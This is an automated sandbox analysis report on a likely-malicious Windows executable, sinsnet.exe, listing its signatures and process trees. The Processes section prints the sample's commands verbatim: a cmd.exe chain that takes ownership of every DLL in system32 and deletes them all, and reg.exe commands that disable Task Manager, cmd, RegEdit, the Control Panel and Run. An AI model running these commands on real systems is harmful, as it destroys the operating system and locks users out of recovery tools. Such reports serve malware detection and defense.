Malware Analysis Report

2024-11-16 12:47

Sample ID 240806-lkgmwswbjn
Target sinsnet.exe
SHA256 7d8e32bc982aeb23d3e6f088a11e1465391d860346607f71d6b2b809c59a2ca3
Tags
discovery evasion exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

7d8e32bc982aeb23d3e6f088a11e1465391d860346607f71d6b2b809c59a2ca3

Threat Level: Likely malicious

The file sinsnet.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion exploit

Disables RegEdit via registry modification

Disables cmd.exe use via registry modification

Disables Task Manager via registry modification

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 09:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 09:35

Reported

2024-08-06 09:37

Platform

win7-20240708-en

Max time kernel

148s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1528 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2168 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2168 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2168 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1528 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1528 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1528 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1528 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

Network

N/A

Files

memory/1528-0-0x000000013F290000-0x000000013F430000-memory.dmp

memory/2612-2-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2708-3-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

